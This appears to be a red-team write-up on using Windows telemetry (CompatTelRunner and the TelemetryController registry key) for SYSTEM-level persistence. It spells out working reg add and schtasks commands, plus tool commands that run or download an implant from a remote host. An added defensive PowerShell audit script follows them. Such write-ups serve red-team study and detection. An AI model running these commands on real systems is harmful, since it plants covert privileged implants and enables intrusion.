Microsoft introduced compatibility telemetry in order to collect usage and performance data about Windows systems. The telemetry tasks are executed by the binary “CompatTelRunner.exe”, which is stored in the following location:
CompatTelRunner executes a variety of commands that are retrieved from specific registry keys. TrustedSec has identified that it is feasible to abuse the Windows telemetry mechanism for persistence during red team operations once elevated access has been achieved.
The persistence method requires the following steps:
- Creation of a registry subkey under the “TelemetryController” key
- Creation of a “Command” value that holds the arbitrary command or implant to execute
- Creation of a “Nightly” DWORD value with its data set to “1”
- Execution of the “Microsoft Compatibility Appraiser” scheduled task via the schtasks binary
The above methodology can be achieved by executing the following commands from the command line:
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\Persistence"
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\Persistence" /v Command /t REG_SZ /d "C:\Users\Peter\Downloads\demon.x64.exe"
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\Persistence" /v Nightly /t REG_DWORD /d 1
schtasks /run /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser"
Executing the above commands results in the following modifications to the registry, as displayed below:
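Because the technique leaves a fixed footprint (a subkey under TelemetryController carrying a “Command” value, and a payload spawned by CompatTelRunner.exe), a defender can audit for both. The following PowerShell is an added example for that check; it is not part of the original post or of TrustedSec's tool, and the key path and process names it uses are the ones quoted above. It only reports what it finds; deciding whether an entry is legitimate is left to the reviewer.

```powershell
# Added audit script (not from the original post): lists every subkey under
# TelemetryController that carries a "Command" value, plus any process whose
# parent is CompatTelRunner.exe. Run in an elevated PowerShell session.

$TelemetryControllerKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController'

function Get-TelemetryControllerCommands {
    param([string]$Path = $TelemetryControllerKey)

    if (-not (Test-Path -Path $Path)) { return @() }

    $findings = @()
    foreach ($subKey in Get-ChildItem -Path $Path -ErrorAction SilentlyContinue) {
        $props = Get-ItemProperty -Path $subKey.PSPath -ErrorAction SilentlyContinue
        $command = $props.PSObject.Properties['Command']
        if ($null -eq $command) { continue }          # only subkeys that can run something

        $nightly = $props.PSObject.Properties['Nightly']
        $findings += [pscustomobject]@{
            SubKey  = $subKey.PSChildName
            Command = $command.Value
            Nightly = if ($null -ne $nightly) { $nightly.Value } else { $null }
        }
    }
    return $findings
}

function Get-CompatTelRunnerChildren {
    # Point-in-time snapshot: the appraiser task is short-lived, so a payload
    # that has already exited will not show up here.
    $procs   = Get-CimInstance -ClassName Win32_Process
    $parents = $procs | Where-Object { $_.Name -ieq 'CompatTelRunner.exe' } |
               Select-Object -ExpandProperty ProcessId
    if (-not $parents) { return @() }

    $procs | Where-Object { $parents -contains $_.ParentProcessId } |
        Select-Object ProcessId, ParentProcessId, Name, CommandLine
}

Write-Host "Subkeys with a Command value under TelemetryController:"
Get-TelemetryControllerCommands | Format-Table -AutoSize

Write-Host "Processes currently parented by CompatTelRunner.exe:"
Get-CompatTelRunnerChildren | Format-Table -AutoSize
```

Pairing the registry listing with a process-creation source (for example Sysmon event ID 1 filtered on the parent image) covers the window in which the payload has already exited.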
Establishing persistence via Windows Telemetry can be achieved from an elevated implant session.
Telemetry is a C# binary that implements the persistence method, enabling red teams to use a local path in order to run an arbitrary payload.
shell telemetry.exe install /path:C:\Users\peter\Downloads\demon.x64.exe
Alternatively, telemetry can download an implant from a remote location to disk.
shell telemetry.exe install /url:http://10.0.0.3:9000/demon.x64.exe
Upon execution the tool will create the required registry structure as displayed in the image below:
The implant will be executed in the context of the “CompatTelRunner.exe” process.
The scheduled task is configured to run the “CompatTelRunner.exe” binary with SYSTEM-level privileges, and therefore the implant will execute with the same privileges.
This can be verified by executing the “whoami” command.
The following image displays the active sessions in the compromised host.